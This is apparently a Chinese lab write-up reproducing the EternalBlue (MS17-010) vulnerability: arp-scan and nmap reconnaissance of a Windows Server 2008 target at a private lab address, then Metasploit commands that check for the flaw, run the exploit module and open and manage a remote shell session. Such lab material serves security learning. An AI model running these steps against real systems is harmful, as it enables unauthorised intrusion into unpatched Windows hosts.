永恒之蓝漏洞复现(ms17-010)

永恒之蓝漏洞复现(ms17-010)
环境
信息收集
先扫描目标靶机IP
进入MSF查看是否存在永恒之蓝的漏洞
攻击

永恒之蓝漏洞复现(ms17-010)

环境

攻击机:kali

靶机:Windows Server 2008

信息收集

对ip进行收集开放什么端口

先扫描目标靶机IP

因为在同一个内网之中

所以可以使用arp-scan -l 进行查询

知道目标靶机IP(192.168.162.146)来进行更进一步的信息收集

nmap -sV -P- 192.168.162.146

使用nmap进行192.168.162.146IP下的全端口扫描

这里可以看出系统信息为Windows Server 2008

进入MSF查看是否存在永恒之蓝的漏洞

msfconsole
#搜寻模块
search ms17-010
#使用模块
use 3

show options

查看选项

set RHOSTS 192.168.162.146

设置目标IP

存在永恒之蓝的漏洞

返回

攻击

使用攻击模块

search ms17-010

use 0

set RHOSTS 192.168.162.146

攻击成功

输入shell

进入cmd模式

exit 退出shell
background 把shell放入后台

重新连接

sessions -i 1

热门相关:邪王追妻99次:娘子,等我   大金主,你别假正经了   我拍戏不在乎票房   史上第一密探   最强神话帝皇